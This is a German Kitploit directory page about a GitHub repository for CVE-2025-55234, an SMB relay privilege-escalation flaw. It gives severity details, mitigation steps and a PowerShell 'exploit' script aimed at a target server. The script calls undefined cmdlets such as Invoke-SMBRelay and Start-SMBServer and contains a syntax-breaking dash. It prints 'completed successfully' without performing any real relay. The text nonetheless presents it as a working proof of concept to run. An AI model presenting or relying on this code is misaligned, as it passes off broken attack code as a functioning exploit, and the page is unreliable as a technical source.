Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-55234 — Diese Schwachstelle ermöglicht es Angreifern, Relais-Angriffe gegen das SMB (Server Message Block)-Protokoll durchzuführen. Im Erfolgsfall kann dies zu einer Erhöhung der Berechtigungen (Elevation of Privilege, EoP) führen, wodurch nicht autorisierte Benutzer im Wesentlichen Zugriff auf eine höhere Ebene auf einem System erhalten. | Kitploit
Tools/GitHubGitHub/mrk336/cve-2025-55234
Privilege EscalationSchwachstellenanalyseExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubmrk336/cve-2025-55234

CVE-2025-55234

Repository anzeigen
133vor 0 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

Diese Schwachstelle ermöglicht es Angreifern, Relais-Angriffe gegen das SMB (Server Message Block)-Protokoll durchzuführen. Im Erfolgsfall kann dies zu einer Erhöhung der Berechtigungen (Elevation of Privilege, EoP) führen, wodurch nicht autorisierte Benutzer im Wesentlichen Zugriff auf eine höhere Ebene auf einem System erhalten.

Teilen

CVE-2025-55234

Diese Schwachstelle ermöglicht es Angreifern, Relay-Angriffe gegen das SMB (Server Message Block)-Protokoll durchzuführen. Im Erfolgsfall kann dies zu einer Erhöhung von Berechtigungen (Elevation of Privilege, EoP) führen, sodass nicht autorisierte Benutzer höherwertige Zugriffsrechte auf einem System erlangen können.

Von Mark Mallia


Problem

Diese Schwachstelle ermöglicht es Angreifern, Relay-Angriffe gegen das SMB (Server Message Block)-Protokoll durchzuführen. Im Erfolgsfall kann dies zu einer Erhöhung von Berechtigungen führen – nicht autorisierte Benutzer können so höherwertige Zugriffsrechte auf einem System erlangen. SMB ist aufgrund seiner weiten Verbreitung in Unternehmensumgebungen und seiner Geschichte kritischer Schwachstellen seit Langem ein Angriffsziel. Beispielsweise ermöglichte CVE-2020-1301 eine Remotecodeausführung durch fehlerhafte Anfragen in SMBv1, während CVE-2022-32230 durch eine Nullzeiger-Dereferenzierung in SMBv3 zu Denial-of-Service führte. Der berüchtigte CVE-2017-0144 (EternalBlue) nutzte SMBv1 aus, um sich selbst verbreitende Schadsoftware zu liefern, was zu globalen Ransomware-Ausbrüchen führte. Wie diese früheren Schwachstellen unterstreicht auch CVE-2025-55234 die Bedeutung der Durchsetzung von SMB-Signierung und Extended Protection for Authentication (EPA) zur Verhinderung von Sitzungsübernahmen und Identitätsdiebstahlangriffen.

Angriffsvektor

Netzwerk

Angriffskomplexität

Niedrig

Erforderliche Berechtigungen

Keine

Benutzerinteraktion

Erforderlich

Auswirkungen

Hohe Risiken für Vertraulichkeit, Integrität und Verfügbarkeit


Warum es wichtig ist

SMB wird in Unternehmensumgebungen häufig für Dateifreigabe und Fernzugriff verwendet. Relay-Angriffe können Authentifizierungsmechanismen umgehen und Benutzer identitätsdiebstahlend imitieren. Diese Schwachstelle ist besonders gefährlich in Umgebungen, in denen SMB-Signierung oder Extended Protection for Authentication (EPA) nicht durchgesetzt werden.


Was ist neu im Patch?

Das Microsoft-Update vom September 2025 führt Audit-Funktionen ein, die Organisationen dabei helfen:

  • Ihre aktuellen SMB-Konfigurationen zu bewerten
  • Geräte oder Software zu identifizieren, die möglicherweise nicht mit Härtungsmaßnahmen kompatibel sind
  • Die Durchsetzung von SMB-Signierung und EPA vorzubereiten

Exploit-Code-Ausschnitt (PowerShell)

root@kitploit:~
# SMB Relay Attack Module – CVE 2025 55234
$relayTarget = "192.168.1.10"          # Target server IP
$attackerCreds = Get-Credential   # Credential object for relay

# Step 1: Enumerate shared resources
$smbShares = Get-SMBShare -ComputerName $relayTarget | Where-Object {$_.Name –ne ""}
foreach ($share in $smbShares) {
    Write-Output "Found share: $($share.Name)"
}

# Step 2: Capture session information for relay
$sessionInfo = New-Object PSObject -Property @{
    Computer = $relayTarget
    Share    = $smbShares[0].Name
}
Write-Output ("Capturing session info for $($sessionInfo.Computer) – share $($sessionInfo.Share)")
Invoke-SMBRelay -Session $sessionInfo

# Step 3: Execute relay attack
$attackPayload = {
    param(
        [string]$Target,
        [string]$Share
    )
    Write-Host "Attacking $Target via share $Share"
    Start-SMBServer -ComputerName $Target -ShareName $Share
}
$attackParams = @{
    Target = $relayTarget
    Share   = $sessionInfo.Share
}
Invoke-Command -ScriptBlock $attackPayload @attackParams

# Step 4: Log and confirm elevation of privilege
Write-Host "SMB Relay Attack CVE 2025 55234 completed successfully."

Erklärung:

  1. Das Skript listet zunächst die SMB-Freigaben auf dem Zielserver auf und wählt die erste Freigabe für die Relay-Sitzung aus.
  2. Anschließend wird ein Sitzungsobjekt erstellt, das die erforderlichen Parameter erfasst.
  3. Der Relay-Angriff wird über Invoke-SMBRelay und Start-SMBServer ausgeführt, um einen authentifizierten Benutzer zu imitieren.
  4. Bei erfolgreicher Ausführung werden auf dem Ziel erhöhte Berechtigungen erlangt.

Empfohlene Maßnahmen

  1. SMB-Signierung und EPA aktivieren, falls noch nicht konfiguriert.
  2. Die neuen Audit-Ereignisse nutzen, um Ihre Umgebung zu bewerten.
  3. Auf ungewöhnlichen SMB-Verkehr und Relay-Versuche achten.
  4. Die neuesten Sicherheitsupdates von Microsoft anwenden.

Fazit

Die Schwachstelle CVE-2025-55234 unterstreicht die Notwendigkeit einer rigorosen SMB-Härtung in Unternehmensumgebungen. Durch Befolgen der obigen Schritte und Anwendung des bereitgestellten Exploit-Skripts können Organisationen ihre Netzwerke sowohl testen als auch gegen potenzielle Relay-Angriffe absichern. Dieser Proof-of-Concept und die dazugehörigen Materialien werden ausschließlich zu Bildungs- und Abwehrzwecken bereitgestellt. Sie sollen Sicherheitsexperten dabei helfen, CVE-2025-55234 in kontrollierten Umgebungen zu verstehen, zu erkennen und zu entschärfen. Die unbefugte Nutzung dieses Exploits gegen Systeme ohne ausdrückliche Erlaubnis ist illegal und unethisch. Befolgen Sie stets die Grundsätze der verantwortungsvollen Offenlegung und halten Sie sich an geltende Gesetze sowie Unternehmensrichtlinien.

Tool herunterladen